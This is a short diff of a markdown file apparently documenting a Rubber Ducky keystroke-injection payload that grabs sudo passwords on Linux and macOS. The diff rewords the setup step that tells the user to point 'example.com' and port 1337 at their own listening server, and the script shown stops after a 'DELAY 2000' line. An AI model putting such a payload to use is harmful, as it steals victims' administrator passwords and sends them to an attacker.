abhinavvv03/Rubber-Duckey/Linux-and-OSX-sudo-password-grabber.md

-Change example.com to your own domain or listening IP address and 1337 to your own port of choice.
+Change `example.com` to your listening server address and `1337` to your own port of choice.

 ```
 DELAY 2000